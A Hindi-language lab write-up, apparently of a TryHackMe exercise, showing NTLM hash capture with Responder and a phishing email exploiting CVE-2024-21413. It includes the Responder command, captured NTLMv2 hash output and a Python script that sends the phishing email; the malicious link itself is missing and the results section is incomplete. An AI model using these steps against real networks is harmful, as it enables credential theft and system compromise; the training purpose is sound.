
Responder के माध्यम से NTLM हैश कैप्चर करने और CVE-2024-21413 का शोषण करने वाले फ़िशिंग ईमेल निष्पादित करके सिस्टम से समझौता करने का प्रदर्शन।
परियोजना का उद्देश्य: यह परियोजना नेटवर्क पर उपयोगकर्ताओं से NTLM हैश कैप्चर करने और ईमेल के माध्यम से फिशिंग हमले करने के लिए विभिन्न उपकरणों के उपयोग को प्रदर्शित करने के लिए बनाई गई थी। यह दिखाता है कि नेटवर्क प्रमाणीकरण कमजोरियों और फिशिंग विधियों का उपयोग करके सिस्टम से समझौता कैसे किया जा सकता है।
प्रक्रिया विवरण
मैंने Responder प्रारंभ करने के लिए निम्नलिखित कमांड चलाया:
root@ip-10-10-192-145:~# sudo responder -I ens5
मैंने Responder को ens5 इंटरफ़ेस पर सुनने के लिए कॉन्फ़िगर किया। इसने तुरंत प्रमाणीकरण अनुरोधों को इंटरसेप्ट करना शुरू कर दिया, जिससे मैं नेटवर्क पर उपयोगकर्ताओं से NTLM हैश देख सका, जैसे THM-MONIKERLINK\tryhackme और WORKGROUP\Administrator। जब हैश कैप्चर हो रहे थे तब आउटपुट इस तरह दिखता था:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
इन हैश का उपयोग ब्रूट फोर्स या हैश हमलों जैसे हमलों के लिए किया जा सकता है।
ईमेल में फिशिंग लिंक इस तरह दिखता था:
फिशिंग ईमेल भेजने के लिए उपयोग की गई पूरी Python स्क्रिप्ट यहाँ है:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
यह स्क्रिप्ट एक दुर्भावनापूर्ण लिंक के साथ एक ईमेल भेजती है, जो संभावित रूप से CVE-2024-21413 कमजोरी का शोषण कर सकता है।
परिणाम परिणामस्वरूप, मैं दो प्रमुख पहलुओं को प्रदर्शित करने में सक्षम था:
इस परियोजना ने दिखाया कि कैसे नेटवर्क कमजोरियों और फिशिंग हमलों का उपयोग करके सिस्टम तक पहुँच प्राप्त की जा सकती है। इसने मजबूत प्रमाणीकरण विधियों और ईमेल ट्रैफ़िक फ़िल्टरिंग के माध्यम से ऐसे हमलों से बचाव के महत्व को भी उजागर किया।